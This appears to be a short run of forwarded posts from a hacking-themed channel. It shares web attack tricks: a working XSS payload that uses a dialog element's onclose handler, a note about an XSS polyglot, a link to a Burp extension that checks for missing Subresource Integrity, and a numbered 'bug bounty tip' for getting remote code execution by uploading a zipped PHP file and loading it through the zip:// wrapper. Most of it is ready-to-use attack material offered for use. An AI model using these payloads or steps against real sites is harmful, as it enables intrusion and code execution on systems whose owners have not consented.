Here's an updated polyglot that uses the details tag and now breaks out of template strings too.
We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
sri-check | A Burp Suite extension for identifying missing Subresource Integrity attributes.

https://github.com/PortSwigger/sri-check
Forwarded from 💥CEH training👨🏻‍💻 ⚔️ 🛑
Forwarded from WiFi Hacking
Bug Bounty Hunting Tip:

If you can upload a .zip file to the target, then:

1. Create a .php file (rce.php)

2. Compress it to a .zip file (file.zip)

3. Upload your .zip file to the vulnerable web application.

4. Trigger your RCE via:

( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )